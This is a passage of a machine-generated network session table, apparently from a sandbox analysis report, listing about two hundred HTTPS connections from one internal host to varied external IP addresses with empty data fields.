                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16017192.168.2.1344230145.82.132.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16018192.168.2.136036470.0.7.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16019192.168.2.1337884197.51.205.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16020192.168.2.135372867.241.45.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16021192.168.2.1343422153.252.203.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16022192.168.2.1359314160.136.56.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16023192.168.2.1338018143.62.191.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16024192.168.2.1342192108.209.65.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16025192.168.2.1358798121.189.97.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16026192.168.2.134623286.138.236.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16027192.168.2.133667643.179.33.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16028192.168.2.1350242141.191.9.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16029192.168.2.135680488.240.104.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16030192.168.2.1339848160.111.50.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16031192.168.2.1337412114.135.37.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16032192.168.2.1338674156.169.214.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16033192.168.2.1351238168.9.106.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16034192.168.2.1341616199.138.140.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16035192.168.2.1342920178.162.131.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16036192.168.2.1355820146.255.117.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16037192.168.2.135207065.195.91.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16038192.168.2.135858667.229.135.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16039192.168.2.1355996135.244.235.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16040192.168.2.1359422176.168.217.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16041192.168.2.1337404176.213.100.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16042192.168.2.1348016124.83.187.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16043192.168.2.1354560129.186.150.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16044192.168.2.134316813.231.127.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16045192.168.2.134737640.120.41.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16046192.168.2.135263634.47.165.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16047192.168.2.1352538173.246.97.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16048192.168.2.1356030123.6.171.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16049192.168.2.1351016109.188.235.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16050192.168.2.1346910123.177.114.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16051192.168.2.1355966168.139.139.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16052192.168.2.1339494102.113.146.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16053192.168.2.135633072.238.26.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16054192.168.2.1347704132.243.16.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16055192.168.2.1334916156.98.215.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16056192.168.2.133717066.229.13.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16057192.168.2.1342580180.58.93.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16058192.168.2.1357652123.3.35.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16059192.168.2.133806483.223.65.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16060192.168.2.134965442.220.204.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16061192.168.2.1343748124.71.5.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16062192.168.2.1358838183.38.223.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16063192.168.2.135627653.6.162.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16064192.168.2.135280249.151.221.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16065192.168.2.1353234145.198.184.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16066192.168.2.134585612.92.160.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16067192.168.2.1335172105.94.127.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16068192.168.2.1337340141.140.38.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16069192.168.2.13566329.7.254.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16070192.168.2.1345764198.218.61.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16071192.168.2.133992031.229.226.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16072192.168.2.134180858.247.234.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16073192.168.2.135387653.228.42.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16074192.168.2.1334888157.101.4.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16075192.168.2.1349518173.141.181.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16076192.168.2.133797625.104.197.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16077192.168.2.1342512194.63.180.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16078192.168.2.1350964147.232.80.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16079192.168.2.1341628178.237.33.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16080192.168.2.135367473.81.1.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16081192.168.2.134308673.195.57.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16082192.168.2.1340778180.154.146.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16083192.168.2.136015898.196.242.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16084192.168.2.1340042147.56.227.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16085192.168.2.134542858.97.99.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16086192.168.2.1341974199.110.146.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16087192.168.2.13405024.172.206.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16088192.168.2.1360450130.144.132.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16089192.168.2.1356886140.68.218.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16090192.168.2.135587280.233.11.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16091192.168.2.1335058121.224.11.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16092192.168.2.1360390112.6.99.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16093192.168.2.1348538140.64.192.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16094192.168.2.1333064102.62.16.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16095192.168.2.1350776193.18.25.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16096192.168.2.1338398113.77.36.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16097192.168.2.134375075.110.100.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16098192.168.2.1342302118.93.57.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16099192.168.2.135751264.72.175.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16100192.168.2.133756283.105.212.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16101192.168.2.1339534152.178.172.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16102192.168.2.135474812.11.110.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16103192.168.2.1345074196.217.64.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16104192.168.2.1353428177.7.130.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16105192.168.2.135075048.17.199.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16106192.168.2.13381609.223.215.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16107192.168.2.1338288117.96.71.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16108192.168.2.133747893.167.156.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16109192.168.2.1360952129.179.81.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16110192.168.2.1359700187.209.143.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16111192.168.2.1344902123.55.37.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16112192.168.2.1341680183.56.86.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16113192.168.2.133433667.77.234.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16114192.168.2.1360306194.145.149.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16115192.168.2.1342802147.242.212.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16116192.168.2.1349934206.35.31.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16117192.168.2.135913447.27.10.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16118192.168.2.135143034.41.145.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16119192.168.2.1349630115.237.46.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16120192.168.2.1350356221.18.169.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16121192.168.2.1354016141.221.174.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16122192.168.2.135667082.83.242.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16123192.168.2.134292278.215.100.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16124192.168.2.134398078.186.71.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16125192.168.2.133630842.27.57.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16126192.168.2.136097023.164.163.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16127192.168.2.133584614.34.72.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16128192.168.2.135018251.248.24.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16129192.168.2.1335474121.200.15.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16130192.168.2.1335860170.219.254.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16131192.168.2.134944285.237.31.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16132192.168.2.1359016223.57.168.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16133192.168.2.135811083.67.255.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16134192.168.2.134457072.81.67.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16135192.168.2.1360514181.151.42.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16136192.168.2.1342868117.186.29.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16137192.168.2.134004023.192.34.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16138192.168.2.1332894186.84.128.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16139192.168.2.1347202124.241.145.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16140192.168.2.1350908218.182.90.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16141192.168.2.134157095.17.36.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16142192.168.2.1360288222.8.56.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16143192.168.2.1336808144.148.251.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16144192.168.2.1350464154.101.137.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16145192.168.2.1355708171.73.228.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16146192.168.2.1333022121.126.238.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16147192.168.2.1356564173.212.14.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16148192.168.2.134338046.67.210.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16149192.168.2.134309888.65.147.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16150192.168.2.1347214194.89.166.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16151192.168.2.134997483.37.238.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16152192.168.2.1338166150.9.52.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16153192.168.2.134351634.238.180.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16154192.168.2.1358106107.92.56.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16155192.168.2.1345452119.106.176.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16156192.168.2.1340544146.155.74.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16157192.168.2.1349818210.255.31.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16158192.168.2.1354062103.76.82.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16159192.168.2.135547847.56.223.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16160192.168.2.1340810219.123.73.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16161192.168.2.1356794180.152.123.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16162192.168.2.1336628152.2.135.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16163192.168.2.135193636.241.121.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16164192.168.2.135071051.30.104.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16165192.168.2.1347514190.88.69.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16166192.168.2.1336678151.209.195.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16167192.168.2.1340432145.227.222.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16168192.168.2.1351106104.216.188.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16169192.168.2.1356308199.113.128.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16170192.168.2.135464876.150.62.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16171192.168.2.135807412.127.220.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16172192.168.2.1343336175.236.204.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16173192.168.2.135186635.101.14.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16174192.168.2.133372882.158.6.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16175192.168.2.1333916110.243.43.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16176192.168.2.135433696.16.217.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16177192.168.2.135565646.97.49.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16178192.168.2.1343110146.16.91.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16179192.168.2.1355912194.90.109.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16180192.168.2.1346884219.129.153.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16181192.168.2.1337846156.121.168.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16182192.168.2.1351654130.107.116.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16183192.168.2.135628818.66.109.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16184192.168.2.1359508193.70.7.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16185192.168.2.1357234110.63.89.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16186192.168.2.1333490166.134.164.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16187192.168.2.1338140145.76.123.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16188192.168.2.1339942169.156.32.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16189192.168.2.1334952134.109.204.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16190192.168.2.135961643.76.241.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16191192.168.2.1338332210.112.132.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192192.168.2.134168269.83.185.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16193192.168.2.1348576187.73.253.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16194192.168.2.1344116185.62.178.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16195192.168.2.1344478119.148.222.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16196192.168.2.1337350135.85.25.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16197192.168.2.1335448131.180.10.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16198192.168.2.135703258.32.129.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16199192.168.2.134835651.208.85.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16200192.168.2.1354598177.49.197.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16201192.168.2.1359722195.90.69.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16202192.168.2.13532941.5.136.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16203192.168.2.134299240.202.233.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16204192.168.2.1357788166.74.202.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16205192.168.2.1338154125.125.138.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16206192.168.2.135922867.25.166.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16207192.168.2.133863059.12.145.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16208192.168.2.1340920136.242.206.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16209192.168.2.133476465.190.194.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16210192.168.2.135872461.175.12.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16211192.168.2.1357038206.121.226.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16212192.168.2.1348636192.84.27.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16213192.168.2.1358692116.161.215.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16214192.168.2.1334962198.103.31.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16215192.168.2.1344918183.237.83.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16216192.168.2.134776027.140.227.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16217192.168.2.1345132159.153.198.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16218192.168.2.134440436.55.52.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16219192.168.2.134777287.225.203.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16220192.168.2.134085420.35.253.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16221192.168.2.136042493.53.226.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16222192.168.2.133565667.80.94.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16223192.168.2.1354432109.37.43.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16224192.168.2.1353294120.70.215.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16225192.168.2.1350994153.212.237.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16226192.168.2.1340810191.214.244.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16227192.168.2.135596454.196.65.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16228192.168.2.1353788142.40.170.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
